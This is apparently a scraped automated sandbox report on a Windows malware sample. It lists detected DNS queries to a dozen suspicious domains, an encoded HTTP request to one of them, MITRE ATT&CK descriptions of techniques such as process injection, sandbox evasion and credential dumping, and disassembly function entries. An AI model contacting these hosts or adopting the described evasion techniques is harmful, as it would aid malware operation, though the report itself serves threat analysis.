Source: global traffic	HTTP traffic detected: GET /xofx/?GHcxP=10HpjR&DX3L=7Kz/d1Mn0itGo3PcxGtVXIDKGx/doyF9AQrzLtlTvtwBfjS8t6Z4ijhUFUW9pm5QBgNFDTiCIqoC/P9QUMAo19NGVuOnOfO55joMFXlim+H5rqnxtr/5GeI= HTTP/1.1Host: www.gloryastore.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.sendly.digital
Source: global traffic	DNS traffic detected: DNS query: www.admaioraluxury.com
Source: global traffic	DNS traffic detected: DNS query: www.tyc01054.top
Source: global traffic	DNS traffic detected: DNS query: www.le-pier.online
Source: global traffic	DNS traffic detected: DNS query: www.37wx.baby
Source: global traffic	DNS traffic detected: DNS query: www.avantfize.shop
Source: global traffic	DNS traffic detected: DNS query: www.zippio.top
Source: global traffic	DNS traffic detected: DNS query: www.alanshortz.buzz
Source: global traffic	DNS traffic detected: DNS query: www.mtmoriacolives.store
Source: global traffic	DNS traffic detected: DNS query: www.trytalnts.online
Source: global traffic	DNS traffic detected: DNS query: www.gloryastore.site

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report alWUxZvrvU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\220i73Hn

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
alWUxZvrvU.exe

Function 00C88523 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Function 00C876C3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00C9C5E3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 00EE2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 00EE2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 00EE2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 00EE35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 00C83F08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
threadwindowCOMMON

Function 00C83F13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Function 00C9C963 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00C9C913 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00C9C9B3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 00EE2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre